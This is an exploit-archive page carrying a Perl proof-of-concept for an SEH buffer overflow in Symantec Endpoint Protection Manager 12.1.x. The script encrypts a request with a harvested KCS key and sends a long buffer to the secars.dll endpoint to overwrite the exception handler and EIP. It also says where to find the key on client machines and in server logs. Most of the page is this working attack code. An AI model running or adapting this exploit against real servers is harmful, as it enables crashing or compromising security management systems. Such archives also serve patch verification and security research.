Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

2014.04.27
Credit: st3n
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz #!/usr/bin/perl -w # Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC # Date: 31 January 2013 # Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com) # Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection # Version: 12.1.0 -> 12.1.2 # Tested on: Windows 2003 Enterprise Edition SP2 # CVE : CVE-2013-1612 # More info on: http://funoverip.net/?p=1693 # #===================================================================================== # # This POC code overwrite EIP with "CCCCCCCC" # # About KCS Key: That key is used to obfuscate traffic between client and server. # The key is generated during SEPM installation. # We need that key to talk with the SEPM server.. # # Where to find KCS Key ? # On a managed client station. Search for "Kcs" inside: # # - Win7/Vista/W2k8/and more : # C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml # - Windows XP : # C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\ # CurrentVersion\\Data\\Config\\SyLink.xml # # On server side, check the logs: # C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log #===================================================================================== use warnings; use strict; use IO::Socket::INET; use SEPM::SEPM; # SEP Manager host/ip my $host = "192.168.60.186"; my $port = 8014; # Kcs key my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E"; # ---- config end ----- # flush after every write $| = 1; # Send HTTP request function sub send_request { my $param = shift; # URL parameters my $post_data = shift; # POST DATA my $sock = IO::Socket::INET->new("$host:$port"); if($sock){ print "Connected.. \n"; # HTTP request my $req = "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" . "User-Agent: Smc\r\n" . "Host: $host\r\n" . "Content-Length: " . length($post_data) . "\r\n" . "\r\n" . $post_data ; # Sending print $sock $req; # Read HTTP response my $resp = ''; while(<$sock>){ $resp .=$_; } #print $resp; if($resp =~ /400 Bad Request/) { print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n"; } close $sock; } } # SEP object my $sep = SEPM::SEPM->new(); print "[*] Target: $host:$port\n"; print "[*] KCS Key: $Kcs_hex\n"; # SEPM object for obfuscation print "[*] Generating master encryption key\n"; $sep->genkey($Kcs_hex); # Obfuscate URL parameters print "[*] Encrypting URI\n"; my $h = $sep->obfuscate("l=9&action=26"); # The evil buff print "[*] Building evil buffer\n"; my $buf = "foo=[hex]" . # [hex] call the vulnerable parsing function "F" x 1288 . # Junk "B" x 8 . # Pointer to next SEH record "CCCCCCCC". # SEH Handler, will overwrite EIP register "D" x 500; # Trigger "Memory Access Violation" exception # Sending request print "[*] Sending HTTP request\n"; send_request($h, # URL parameters $buf # post data ); print "[*] Done\n";

References:

http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top